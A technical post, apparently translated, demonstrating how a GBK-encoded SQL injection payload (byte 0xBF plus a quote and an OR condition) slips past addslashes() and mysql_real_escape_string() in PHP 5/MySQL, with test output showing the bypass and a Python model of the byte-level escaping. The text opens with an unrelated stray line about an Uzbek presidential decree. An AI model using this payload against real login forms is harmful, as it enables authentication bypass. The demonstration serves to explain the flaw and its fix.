Also, by the decree of the President of Uzbekistan of 7 February, 2017




Date: 20.05.2024

Test results:
MySQL

mysql> select version();
+---------------------+
| version()           |
+---------------------+
| 5.0.45-community-nt |
+---------------------+
1 row in set (0.00 sec)

mysql> CREATE TABLE users (
    -> username VARCHAR(32) CHARACTER SET GBK,
    -> password VARCHAR(32) CHARACTER SET GBK,
    -> PRIMARY KEY (username)
    -> );
Query OK, 0 rows affected (0.08 sec)

mysql> insert into users SET username='ewrfg', password='wer44';
Query OK, 1 row affected (0.02 sec)

mysql> insert into users SET username='ewrfg2', password='wer443';
Query OK, 1 row affected (0.03 sec)

mysql> insert into users SET username='ewrfg4', password='wer4434';
Query OK, 1 row affected (0.00 sec)


PHP

<?php
echo "PHP version: ".PHP_VERSION."\n";

mysql_connect();
mysql_select_db("test");
// Switches the encoding on the server side only; the client library is not told about it
mysql_query("SET NAMES GBK");

// Byte 0xBF followed by a single quote, then the injected condition
$_POST['username'] = chr(0xbf).chr(0x27).' OR username = username /*';
$_POST['password'] = 'guess';

// Test 1: addslashes(), which knows nothing about the connection encoding
$username = addslashes($_POST['username']);
$password = addslashes($_POST['password']);
$sql = "SELECT * FROM users WHERE username = '$username' AND password = '$password'";
$result = mysql_query($sql) or trigger_error(mysql_error().$sql);
var_dump($username);
var_dump(mysql_num_rows($result));
var_dump(mysql_client_encoding());

// Test 2: mysql_real_escape_string() while the client still reports latin1
$username = mysql_real_escape_string($_POST['username']);
$password = mysql_real_escape_string($_POST['password']);
$sql = "SELECT * FROM users WHERE username = '$username' AND password = '$password'";
$result = mysql_query($sql) or trigger_error(mysql_error().$sql);
var_dump($username);
var_dump(mysql_num_rows($result));
var_dump(mysql_client_encoding());

// Test 3: the same escaping after mysql_set_charset() has set the client encoding
mysql_set_charset("GBK");
$username = mysql_real_escape_string($_POST['username']);
$password = mysql_real_escape_string($_POST['password']);
$sql = "SELECT * FROM users WHERE username = '$username' AND password = '$password'";
$result = mysql_query($sql) or trigger_error(mysql_error().$sql);
var_dump($username);
var_dump(mysql_num_rows($result));
var_dump(mysql_client_encoding());
Result

PHP version: 5.3.3
string(29) "ї\' OR username = username /*"
int(3)
string(6) "latin1"
string(29) "ї\' OR username = username /*"
int(3)
string(6) "latin1"
string(30) "\ї\' OR username = username /*"
int(0)
string(3) "gbk"
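
The three results above come down to whether the escaping function and the server agree on the connection encoding. The following added example (not part of the original page, and not MySQL or PHP source) models that at byte level in Python; the function names are hypothetical and the payload is the same constructed input as in the PHP test.

```python
# Added example (hypothetical names): simplified byte-level model, not MySQL or PHP source.
QUOTE, DQUOTE, BACKSLASH = SPECIAL = 0x27, 0x22, 0x5C

def gbk_pair(buf, i):
    """True if buf[i:i+2] is a complete two-byte GBK character."""
    return (i + 1 < len(buf) and 0x81 <= buf[i] <= 0xFE
            and 0x40 <= buf[i + 1] <= 0xFE and buf[i + 1] != 0x7F)

def byte_escape(raw):
    """Charset-unaware escaping (addslashes, or an escaper that believes latin1)."""
    out = bytearray()
    for b in raw:
        if b in SPECIAL:
            out.append(BACKSLASH)
        out.append(b)
    return bytes(out)

def gbk_escape(raw):
    """Charset-aware escaping: whole GBK characters pass through untouched."""
    out, i = bytearray(), 0
    while i < len(raw):
        if gbk_pair(raw, i):
            out += raw[i:i + 2]          # complete character: copy as-is
            i += 2
            continue
        if 0x81 <= raw[i] <= 0xFE or raw[i] in SPECIAL:
            out.append(BACKSLASH)        # stray lead byte or special byte
        out.append(raw[i])
        i += 1
    return bytes(out)

def literal_end(body, server_is_gbk):
    """Index of the byte that closes a '...' literal as the server scans it, or None."""
    i = 0
    while i < len(body):
        if server_is_gbk and gbk_pair(body, i):
            i += 2                       # one character, even if its 2nd byte is 0x5C
        elif body[i] == BACKSLASH:
            i += 2                       # escape sequence: next byte is data
        elif body[i] == QUOTE:
            return i                     # unescaped quote: literal ends here
        else:
            i += 1
    return None

# Constructed input: same bytes as $_POST['username'] in the test above.
PAYLOAD = b"\xbf' OR username = username /*"
for esc in (byte_escape, gbk_escape):
    print(esc.__name__, esc(PAYLOAD), literal_end(esc(PAYLOAD), True))
```

With byte-level escaping the inserted backslash becomes the second byte of a GBK character, so the quote after it closes the literal; the charset-aware version leaves no unescaped quote, which matches the `int(3)` and `int(0)` rows in the output.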
A characteristic detail that I mentioned above: until recently it was impossible to set the connection encoding in PDO at all. PDO has no function like mysql_set_charset(), and before version 5.3 the DSN had only a mock-up of the charset parameter, which raised no error but did not set any encoding either.
Apart from the chance to troll people who talk about how PDO protects against everything, there is nothing of particular value in this.


